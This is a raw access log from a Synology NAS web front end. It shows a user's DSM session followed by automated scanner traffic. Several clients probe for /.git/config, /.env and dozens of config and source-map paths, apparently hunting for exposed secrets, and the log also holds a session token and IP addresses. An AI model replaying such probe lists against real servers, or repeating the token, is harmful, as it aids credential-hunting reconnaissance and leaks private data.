180] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:15:12 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 86] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:15:12 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 465] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:15:14 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 859] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:15:14 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/SynologyDrive/images/status_no_128.png" [Client 84.1.26.27] [Length 4830] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/webman/3rdparty/SynologyDrive/style.css?v=1731304862" +[16/Jan/2026:11:15:17 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 545] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:15:18 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 86] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:15:20 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 65] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:15:21 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 180] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:15:23 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 86] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:15:27 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 471] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:15:28 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 86] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:15:28 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 42] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:15:28 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 52] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:15:30 +0000] - 200 200 - GET https nas.profibot.hu "/webman/taskbar/dist/assets/b39aa82a11b1d50495c2c033cb0022a7.png" [Client 84.1.26.27] [Length 649] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/webman/taskbar/dist/style.css?v=1661421011" +[16/Jan/2026:11:15:30 +0000] - 200 200 - GET https nas.profibot.hu "/webman/taskbar/dist/assets/27c6d877aa6e7901a36f87067a07a5a0.png" [Client 84.1.26.27] [Length 573] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/webman/taskbar/dist/style.css?v=1661421011" +[16/Jan/2026:11:15:30 +0000] - 200 200 - GET https nas.profibot.hu "/webman/taskbar/dist/assets/d18b3418314572ed3fd6d2a7683aaaa2.png" [Client 84.1.26.27] [Length 521] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/webman/taskbar/dist/style.css?v=1661421011" +[16/Jan/2026:11:15:30 +0000] - 200 200 - GET https nas.profibot.hu "/webman/taskbar/dist/assets/f3204f7a4bc817bacbe7772ab65d27b7.png" [Client 84.1.26.27] [Length 512] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/webman/taskbar/dist/style.css?v=1661421011" +[16/Jan/2026:11:15:30 +0000] - 200 200 - GET https nas.profibot.hu "/webman/taskbar/dist/assets/4f42ef91fdc860b29977b3c1114084d9.png" [Client 84.1.26.27] [Length 434] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/webman/taskbar/dist/style.css?v=1661421011" +[16/Jan/2026:11:15:31 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 4326] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:15:31 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 180] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:15:32 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 187] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:15:33 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 86] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:15:33 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.Core.UserSettings&method=apply&version=1&SynoToken=kcDFKpRQAlHyU" [Client 84.1.26.27] [Length 4326] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:15:33 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 42] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:15:33 +0000] - 101 101 - GET https nas.profibot.hu "//synoscgi.sock/socket.io/?Version=42962&SynoToken=kcDFKpRQAlHyU&UserType=user&EIO=3&transport=websocket&sid=MYGbsqAY1nkgG_ZuAAAE" [Client 84.1.26.27] [Length 5985] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "-" +[16/Jan/2026:11:15:33 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.API.Auth" [Client 84.1.26.27] [Length 42] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:15:33 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.Core.UserSettings&method=apply&version=1&SynoToken=kcDFKpRQAlHyU" [Client 84.1.26.27] [Length 64] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:15:33 +0000] - - 499 - GET https nas.profibot.hu "/" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:15:33 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.Core.UserSettings&method=apply&version=1&SynoToken=kcDFKpRQAlHyU" [Client 84.1.26.27] [Length 64] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:15:33 +0000] - 200 200 - GET https nas.profibot.hu "/" [Client 84.1.26.27] [Length 2819] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:15:33 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.Core.Desktop.SessionData&version=1&method=getjs&SynoToken=&v=1656670912" [Client 84.1.26.27] [Length 708] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:15:34 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi/SYNO.API.Auth.UIConfig" [Client 84.1.26.27] [Length 11856] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:15:34 +0000] - 200 200 - GET https nas.profibot.hu "/webman/resources/images/icon_dsm_32.png?v=40438" [Client 84.1.26.27] [Length 752] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:15:20:28 +0000] - 403 403 - GET https nas.profibot.hu "/.git/config" [Client 195.178.110.191] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (X11; Linux x86_64; rv:1.9.6.20) Gecko/ Firefox/9.0" "-" +[16/Jan/2026:17:54:56 +0000] - - 301 - GET http nas.profibot.hu "/" [Client 34.74.160.194] [Length 166] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (compatible; CMS-Checker/1.0; +https://example.com)" "-" +[16/Jan/2026:17:54:57 +0000] - 200 200 - GET https nas.profibot.hu "/" [Client 34.74.160.194] [Length 2819] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (compatible; CMS-Checker/1.0; +https://example.com)" "http://nas.profibot.hu" +[16/Jan/2026:19:56:11 +0000] - - 301 - GET http nas.profibot.hu "/" [Client 136.118.56.44] [Length 166] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (compatible; CMS-Checker/1.0; +https://example.com)" "-" +[16/Jan/2026:19:56:12 +0000] - 200 200 - GET https nas.profibot.hu "/" [Client 136.118.56.44] [Length 2819] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (compatible; CMS-Checker/1.0; +https://example.com)" "http://nas.profibot.hu" +[17/Jan/2026:18:29:07 +0000] - 200 200 - GET https nas.profibot.hu "/" [Client 162.142.125.119] [Length 2843] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[17/Jan/2026:18:29:11 +0000] - 200 200 - GET https nas.profibot.hu "/webman/resources/images/icon_dsm_96.png?v=40438" [Client 162.142.125.119] [Length 2271] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[17/Jan/2026:18:29:11 +0000] - 200 200 - GET https nas.profibot.hu "/webman/favicon.ico?v=40438" [Client 162.142.125.119] [Length 1099] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[17/Jan/2026:18:29:12 +0000] - 200 200 - GET https nas.profibot.hu "/webman/resources/images/icon_dsm_64.png?v=40438" [Client 162.142.125.119] [Length 1312] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[17/Jan/2026:18:29:13 +0000] - 200 200 - GET https nas.profibot.hu "/webman/resources/images/icon_dsm_48.png?v=40438" [Client 162.142.125.119] [Length 1099] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[17/Jan/2026:18:29:14 +0000] - 200 200 - GET https nas.profibot.hu "/webman/resources/images/icon_dsm_32.png?v=40438" [Client 162.142.125.119] [Length 752] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[17/Jan/2026:22:36:59 +0000] - - 301 - GET http nas.profibot.hu "/" [Client 167.94.138.188] [Length 166] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[18/Jan/2026:00:34:55 +0000] - 403 403 - GET https nas.profibot.hu "/.git/HEAD" [Client 130.49.216.53] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Fuzz Faster U Fool v2.1.0-dev" "-" +[18/Jan/2026:14:14:34 +0000] - 403 403 - GET https nas.profibot.hu "/.env" [Client 204.76.203.25] [Length 11939] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.3" "-" +[19/Jan/2026:07:43:20 +0000] - 200 200 - GET https nas.profibot.hu "/" [Client 198.12.106.59] [Length 2850] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.0 Safari/605.1.15" "-" +[20/Jan/2026:06:56:13 +0000] - 200 200 - GET https nas.profibot.hu "/" [Client 84.1.26.27] [Length 2819] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "-" +[20/Jan/2026:06:56:13 +0000] - 304 304 - GET https nas.profibot.hu "/webman/3rdparty/WebDAVServer/style.css?v=1767609886" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[20/Jan/2026:06:56:13 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.Core.Desktop.SessionData&version=1&method=getjs&SynoToken=&v=1656670912" [Client 84.1.26.27] [Length 708] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[20/Jan/2026:06:56:14 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi/SYNO.API.Auth.UIConfig" [Client 84.1.26.27] [Length 11856] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[20/Jan/2026:13:21:21 +0000] - 200 200 - GET https nas.profibot.hu "/robots.txt" [Client 74.7.175.162] [Length 26] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot" "-" +[20/Jan/2026:15:24:54 +0000] - - 301 - GET http nas.profibot.hu "/" [Client 34.23.96.35] [Length 166] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (compatible; CMS-Checker/1.0; +https://example.com)" "-" +[20/Jan/2026:15:24:55 +0000] - 200 200 - GET https nas.profibot.hu "/" [Client 34.23.96.35] [Length 2819] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (compatible; CMS-Checker/1.0; +https://example.com)" "http://nas.profibot.hu" +[20/Jan/2026:17:21:25 +0000] - 404 404 - GET https nas.profibot.hu "/constants.js" [Client 216.81.245.209] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:25 +0000] - 404 404 - GET https nas.profibot.hu "/donate" [Client 216.81.245.209] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:25 +0000] - 404 404 - GET https nas.profibot.hu "/dist/main.js" [Client 216.81.245.209] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:25 +0000] - 404 404 - GET https nas.profibot.hu "/_nuxt/vendors.app.js" [Client 216.81.245.209] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:25 +0000] - 404 404 - GET https nas.profibot.hu "/main.js" [Client 216.81.245.209] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:25 +0000] - 404 404 - GET https nas.profibot.hu "/_app/immutable/chunks/index.js" [Client 216.81.245.209] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:25 +0000] - 404 404 - GET https nas.profibot.hu "/src/env.d.ts" [Client 216.81.245.209] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:25 +0000] - 404 404 - GET https nas.profibot.hu "/settings.json" [Client 216.81.245.209] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:25 +0000] - 404 404 - GET https nas.profibot.hu "/dist/main.js.map" [Client 216.81.245.209] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:25 +0000] - 404 404 - GET https nas.profibot.hu "/public/js/main.js" [Client 216.81.245.209] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:25 +0000] - 404 404 - GET https nas.profibot.hu "/api/settings" [Client 216.81.245.209] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:25 +0000] - 403 403 - GET https nas.profibot.hu "/.svelte-kit/output/client/_app/env.js" [Client 216.81.245.209] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:25 +0000] - 404 404 - GET https nas.profibot.hu "/_nuxt/config.js" [Client 216.81.245.209] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:25 +0000] - 404 404 - GET https nas.profibot.hu "/static/js/2.chunk.js" [Client 216.81.245.209] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:25 +0000] - 404 404 - GET https nas.profibot.hu "/_astro/client.js" [Client 216.81.245.209] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:25 +0000] - 404 404 - GET https nas.profibot.hu "/_app/env.js" [Client 216.81.245.209] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:25 +0000] - 404 404 - GET https nas.profibot.hu "/__env.js" [Client 216.81.245.209] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:25 +0000] - 403 403 - GET https nas.profibot.hu "/dist/.vite/manifest.json" [Client 216.81.245.209] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:25 +0000] - 404 404 - GET https nas.profibot.hu "/build/bundle.js.map" [Client 216.81.245.209] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:25 +0000] - 404 404 - GET https nas.profibot.hu "/webpack-runtime.js" [Client 216.81.245.209] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:25 +0000] - 404 404 - GET https nas.profibot.hu "/vendor.js.map" [Client 216.81.245.209] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:25 +0000] - 404 404 - GET https nas.profibot.hu "/_nuxt/vendors.app.js.map" [Client 216.81.245.209] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:25 +0000] - 404 404 - GET https nas.profibot.hu "/_next/static/chunks/pages/_app.js" [Client 216.81.245.209] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:25 +0000] - 404 404 - GET https nas.profibot.hu "/_app/immutable/entry/app.js" [Client 216.81.245.209] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:25 +0000] - 404 404 - GET https nas.profibot.hu "/sw.js" [Client 216.81.245.209] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:25 +0000] - 404 404 - GET https nas.profibot.hu "/checkout.js" [Client 216.81.245.209] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:25 +0000] - 404 404 - GET https nas.profibot.hu "/dist/client.js" [Client 216.81.245.209] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:25 +0000] - 404 404 - GET https nas.profibot.hu "/runtime.js.map" [Client 216.81.245.209] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:25 +0000] - 404 404 - GET https nas.profibot.hu "/_next/static/chunks/1.js" [Client 216.81.245.209] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:25 +0000] - 404 404 - GET https nas.profibot.hu "/_app/immutable/entry/start.js" [Client 216.81.245.209] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:25 +0000] - 404 404 - GET https nas.profibot.hu "/api/config" [Client 216.81.245.209] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:26 +0000] - 404 404 - GET https nas.profibot.hu "/settings.js" [Client 216.81.245.209] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:26 +0000] - 404 404 - GET https nas.profibot.hu "/config.js" [Client 216.81.245.209] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:26 +0000] - 404 404 - GET https nas.profibot.hu "/__config.js" [Client 216.81.245.209] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:26 +0000] - 404 404 - GET https nas.profibot.hu "/@vite/env" [Client 216.81.245.209] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:26 +0000] - 404 404 - GET https nas.profibot.hu "/runtime-config.js" [Client 216.81.245.209] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:26 +0000] - 404 404 - GET https nas.profibot.hu "/cart" [Client 216.81.245.209] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" 